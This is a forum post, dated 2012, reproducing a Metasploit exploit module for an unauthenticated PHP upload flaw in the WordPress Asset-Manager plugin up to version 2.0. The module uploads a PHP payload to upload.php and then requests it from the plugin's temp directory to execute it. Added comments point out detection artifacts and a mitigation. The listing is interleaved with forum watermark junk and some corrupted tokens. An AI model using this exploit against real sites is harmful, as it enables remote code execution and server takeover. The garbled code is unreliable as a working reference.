
标题: WordPress Asset-Manager PHP文件上传漏洞

作者: admin    时间: 2012-12-31 09:22
标题: WordPress Asset-Manager PHP文件上传漏洞
这个 Metasploit 模块利用的是在 WordPress Asset-Manager 插件 2.0 及以下版本中发现的漏洞：该插件允许上传 PHP 文件，用户无需身份验证即可将文件上传到一个临时目录，从而导致任意代码执行。
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

, e% ]. R% b: v" U% Krequire 'msf/core'4 Z  @. s/ Q2 X/ n" V! D/ n& G
require 'msf/core/exploit/php_exe'2 x- o6 b5 H: |

# Metasploit exploit module for the Asset-Manager (<= 2.0) WordPress plugin, as
# pasted on the forum. The listing is interleaved with the forum's anti-copy
# watermark text (runs such as "6 |+ h* M3 S!") and several tokens are
# corrupted by the forum's text filter, so it is reproduced here for analysis
# of the attack pattern rather than as runnable code.
- E% z) Y6 Z* V3 O' G/ Hclass Metasploit3 < Msf::Exploit::Remote9 N5 U/ O/ f! B; |  ^
  Rank = ExcellentRanking+ V( F$ U4 F/ s* i; ^: ]

7 w( r- m  v9 r6 e  include Msf::Exploit::Remote::HttpClient4 b1 t- Z5 K0 Y" V  f0 I- H+ w' @! w
  include Msf::Exploit:hpEXE/ j, J) h2 L9 O7 O2 e
6 p. R; _8 |- L0 ~$ y
  # Module metadata: affected plugin versions (<= 2.0), references (OSVDB 82653,
  # BID 53809, EDB 18993), payload constraints and the single option TARGETURI
  # (WordPress base path, default '/wordpress').
  # NOTE(review): the 'URL' reference below appears to have been substituted by
  # the forum rather than taken from the upstream module; treat it as unverified.
  def initialize(info = {})$ |( E" [3 F  k5 S& K6 B
    super(update_info(info,6 |+ h* M3 S! a$ Y/ M. W! i6 @
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
. T0 y. e2 k! S  F/ l# E      'Description'    => %q{
" f0 B( {+ ]4 X% W. V        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress
/ f/ C7 E, y( A( \        plugin.  By abusing the upload.php file, a malicious user can upload a file to a& T" n* a0 L! n" x8 t
        temp directory without authentication, which results in arbitrary code execution.
$ x% v$ x4 x4 f5 f5 Q. {; j      },
& ~4 O! w* |& Z4 I' ^0 s8 U      'Author'         =>
: e! J; g4 J. c        [, m3 e% R& }& }6 O
          'Sammy FORGIT', # initial discovery! f& v( P3 `" K* p
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module5 m* R- P1 l% I! `+ g
        ],; [* C+ O9 |; g
      'License'        => MSF_LICENSE,2 r' K: Z& \; X' h' w1 i
      'References'     =>" a0 f# u: X7 j1 U, a6 ?3 b
        [. @9 M# M0 `& \  ^. w
          [ 'OSVDB', '82653' ],  U6 f/ r' ]6 o7 q
          [ 'BID', '53809' ],8 l1 F# X) J, e& v) Y- T
          [ 'EDB', '18993' ],
6 S  D, J$ W; s          [ 'URL', 'http:// www.myhack58.com /' ]- b+ a# \" V, |$ g3 B# q' ?1 g
        ],
/ p* J$ ?/ C5 W, ?& |9 n      'Payload'       =>
1 _' Z% z4 q+ V        {  X* k0 ], _+ Y4 Y
          'BadChars' => "\x00",
% C& a1 |3 k  |% D0 c8 w* n1 M. s% s        },
+ ^  L. r/ J/ m5 u. }* S& Y3 k      'Platform'       => 'php',
0 s  S7 x. }6 E# f! ^. {+ V      'Arch'           => ARCH_PHP," |7 y- P. C' j5 j) V- _" J' H
      'Targets'        =>
% g6 S1 b3 }: [        [( w6 O; y* l* j' ?" I0 v% F% t
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
, W6 y. O; d2 ]" B% U( j5 R9 I          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
  ~, E: K1 k2 g$ C0 |        ],
/ j/ s: u( y7 L( B1 \      'DefaultTarget' => 0,; |1 I/ P/ E8 f9 U' K; w
      'DisclosureDate' => 'May 26 2012'))- c: b2 L, ?1 K

2 B. y, i* o1 J8 z/ q8 \' E    register_options(
& |* x  [  b. |7 k7 m      [
' e. N7 |+ w, l- D, z2 f4 s        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])# Z, Z5 y- n* o% ]# u& R- Z
      ], self.class)% O3 i, {9 L/ G  Q6 r( C
  end
! W. _3 J1 G, w( i, ^+ h& V+ Z
  # Exploit flow: two unauthenticated HTTP requests. From a defender's view the
  # observable artifacts are (1) a multipart POST to
  # wp-content/plugins/asset-manager/upload.php whose form field "Filedata"
  # carries a .php filename, and (2) a GET to
  # wp-content/uploads/assets/temp/<name>.php shortly afterwards.
$ }! ?+ `; J4 s8 D5 m7 C/ L  def exploit0 M3 N- C- j) A8 f2 V* Q) U2 x
    # Normalise TARGETURI to a trailing slash so the plugin paths below can be
    # appended directly.
    uri =  target_uri.path
8 a8 y# ^4 E- k1 [0 X    uri << '/' if uri[-1,1] != '/'
9 T9 u5 E3 i( m    peer = "#{rhost}:#{rport}"/ D) V6 B# d' E2 [  ~
    # Five random alpha characters plus ".php": the upload name is not
    # predictable, so detection should key on the path and the .php extension,
    # not on a fixed filename.
    payload_name = "#{rand_text_alpha(5)}.php"
    # :unlink_self presumably makes the dropped file remove itself once run, so
    # the file may be gone by the time of an investigation; web-server access
    # logs for the two paths above are the durable artifact.
* f" C1 ]4 {5 w3 g5 {. \    php_payload = get_write_exec_payload(:unlink_self=>true)# J/ c- k1 A% e* c% P& f5 x& f2 h

    # Multipart body with a single part; the gsub strips a leading CRLF that
    # would otherwise precede the first "--_Part_" boundary.
: C6 c/ @$ H. W/ x0 D9 H    data = Rex::MIME::Message.new+ g1 m% V1 X# b5 l6 j. d! ^1 ^
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")6 r4 ]6 `+ i/ F0 Q! \# O% T
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')  f/ W8 H# n# l8 c/ I

    # Request 1: the upload. No cookie, credential or nonce is sent with it —
    # the missing authentication check is the defect the module relies on.
& X3 g  D& V9 q" g    print_status("#{peer} - Uploading payload #{payload_name}")9 C, b  @* j: d4 \: |; P' I! N
    res = send_request_cgi({
. U1 z; O9 I% w1 V/ Y7 I( G, I- H      'method'  => 'POST',5 C1 ?9 ?* z8 e* P% d
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",% n0 |6 u6 u3 E9 }
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
5 V6 \% G; d+ M& r+ O0 C5 H      'data'    => post_data
8 B2 g) I4 r8 S8 ]5 t( r2 x/ q    })2 P4 s/ q3 n/ w8 g: A9 t

    # The upload counts as successful only when the server answers 200 and
    # echoes the uploaded filename in the body.
) K7 x% _) q. z9 L- ^& u: X    if not res or res.code != 200 or res.body !~ /#{payload_name}/6 @1 G7 Z. b8 n. q# ~5 P7 l
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")' r9 A% ~$ T9 ?2 J# I
end
+ Q+ D' |, Z3 a9 P3 ]( l 4 l0 ~7 T& ?  I7 T" x
    # Request 2: fetching the uploaded file from the plugin's temp upload
    # directory is what executes it. Disallowing PHP execution beneath
    # wp-content/uploads in the web-server configuration breaks this step even
    # when the upload itself succeeds.
    print_status("#{peer} - Executing payload #{payload_name}"); O5 l! E9 S/ H
    res = send_request_raw({
  p" C) _/ v- [* b: _8 q2 F      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",: \7 K% i3 g: b
      'method'  => 'GET'
" Z: R' I/ _* S1 i1 b( Z* k    })
* b* T. Y. o, ~- @ * x& H' v" [, e' i/ G7 K
    # A nil response is deliberately not treated as failure here (presumably
    # because a running payload may not return a normal reply); only an
    # explicit non-200 status is.
    if res and res.code != 200
! l6 C& B$ e7 o3 P+ U      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
  m) Z: b8 R& |    end
" k) x3 q% J2 X0 i  end
) s7 g  k7 D, P! C9 j  Bend5 R; l3 b3 o5 Z3 w* ^* U- M




